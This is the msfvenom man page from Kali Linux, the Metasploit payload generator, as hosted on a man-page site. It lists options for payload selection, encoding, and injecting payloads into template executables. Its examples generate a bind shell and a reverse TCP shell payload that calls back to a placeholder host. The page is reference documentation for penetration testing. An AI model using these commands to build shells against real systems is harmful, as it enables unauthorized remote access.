msfvenom man page on Kali

Man page or keyword search:  
man Server   9211 pages
apropos Keyword Search (all sections)
Output format
Kali logo
[printable version]

MSFVENOM(1)		Metasploit Framework - msfvenom		   MSFVENOM(1)

NAME
       msfvenom - Payload Generator and Encoder

SYNOPSIS
       msfvenom [options] <var=val>

DESCRIPTION
       Msfvenom	 is a combination of Msfpayload and Msfencode, putting both of
       these tools into a single Framework  instance.  Msfvenom	 has  replaced
       both msfpayload and msfencode as of June 8th, 2015.

OPTIONS
       -p,  --payload [payload]	 Payload to use. Specify a '-' or stdin to use
       custom payloads
	   --payload-options	List the payload's standard options

       -l, --list  [module_type]
	      List a module type example: payloads, encoders, nops, all

       -n, --nopsled  [length]
	      Prepend a nopsled of [length] size on to the payload

       -f, --format  [format]
	      Output format (use --help-formats for a list)

       --help-formats
	      List available formats

       -e, --encoder  [encoder]
	      The encoder to use

       -a, --arch  [architecture]
	      The architecture to use

       --platform   [platform]
	      The platform of the payload
	      Cisco or cisco, OSX or osx, Solaris  or  solaris,	 BSD  or  bsd,
	      OpenBSD  or openbsd, Firefox or firefox, BSDi or bsdi, NetBSD or
	      netbsd, NodeJS or nodejs, FreeBSD or freebsd, Python or  python,
	      AIX  or aix, JavaScript or javascript, HPUX or hpux, PHP or php,
	      Irix or irix, Unix or unix, Linux or linux, Ruby or  ruby,  Java
	      or java, Android or android, Netware or netware, Windows or win‐
	      dows

       -s, --space [length] The maximum size of the resulting payload
	   --encoder-space [length]
	     The maximum size of the  encoded  payload	(defaults  to  the  -s
       value)

       -b, --bad-chars	[list]
	      The list of characters to avoid example: '0'

       -i, --iterations	 [count]
	      The number of times to encode the payload

       -c, --add-code  [path]
	      Specify an additional win32 shellcode file to include

       -x, --template  [path]
	      Specify a custom executable file to use as a template

       -k, --keep
	      Preserve	the  template behavior and inject the payload as a new
	      thread

       -o, --out  [path]
	      Save the payload

       -v, --var-name  [name]
	      Specify a custom variable name to use for certain output formats

       --smallest
	      Generate the smallest possible payload

       -h, --help
	      Show this message

       --help-formats
	      List available formats

EXAMPLE
       msfvenom	   --platform	 Windows    -p	  windows/shell/bind_tcp    -e
       x86/shikata_ga_nai -b "0" -f python
       msfvenom	 --platform linux -p linux/x86/shell/reverse_tcp LHOST=w.z.y.z
       LPORT=443 -b "0" -f elf -o file.bin

       For more examples visit	https://www.offensive-security.com/metasploit-
       unleashed/msfvenom

SEE ALSO
       msfcli(1) - deprecated -
       msfconsole(1)
       msfpayload(1) - deprecated -
       msfencode(1) - deprecated -

AUTHOR(S)
       Creator
	      HD Moore - @hdmoore / hdm@metasploit.com
	      Man  Page	 Author:  Kali	Linux™	File  man  page bug reports at
	      https://bugs.kali.org

COPYRIGHT
       Copyright (C) 2006-2015, Rapid7 Inc.  All rights reserved.

       Redistribution and use in source and binary forms, with or without mod‐
       ification,  are	permitted  provided  that the following conditions are
       met:

       *      Redistributions of source code must retain the  above  copyright
	      notice, this list of conditions and the following disclaimer.

       *      Redistributions  in  binary  form must reproduce the above copy‐
	      right notice, this list of conditions  and  the  following  dis‐
	      claimer  in  the	documentation  and/or other materials provided
	      with the distribution.

       *      Neither the name of Rapid7 LLC nor the names of its contributors
	      may  be  used  to	 endorse or promote products derived from this
	      software without specific prior written permission.

	      THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBU‐
	      TORS  "AS	 IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
	      BUT NOT LIMITED TO, THE IMPLIED  WARRANTIES  OF  MERCHANTABILITY
	      AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT
	      SHALL THE COPYRIGHT OWNER OR  CONTRIBUTORS  BE  LIABLE  FOR  ANY
	      DIRECT,  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUEN‐
	      TIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUB‐
	      STITUTE  GOODS  OR  SERVICES;  LOSS OF USE, DATA, OR PROFITS; OR
	      BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF  LIA‐
	      BILITY,  WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUD‐
	      ING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF  THE  USE
	      OF  THIS	SOFTWARE,  EVEN	 IF ADVISED OF THE POSSIBILITY OF SUCH
	      DAMAGE.

	      The Metasploit Framework is  provided  under  the	 3-clause  BSD
	      license above.

	      The copyright on this package is held by Rapid7 LLC.

	      This  license  does  not	apply to several components within the
	      Metasploit Framework source tree.	  For  more  details  see  the
	      LICENSE file.

4.11.4				 July 23, 2015			   MSFVENOM(1)
[top]

List of man pages available for Kali

Copyright (c) for man pages and the logo by the respective OS vendor.

For those who want to learn more, the polarhome community provides shell access and support.

[legal] [privacy] [GNU] [policy] [cookies] [netiquette] [sponsors] [FAQ]
Tweet
Polarhome, production since 1999.
Member of Polarhome portal.
Based on Fawad Halim's script.
....................................................................
Vote for polarhome
Free Shell Accounts :: the biggest list on the net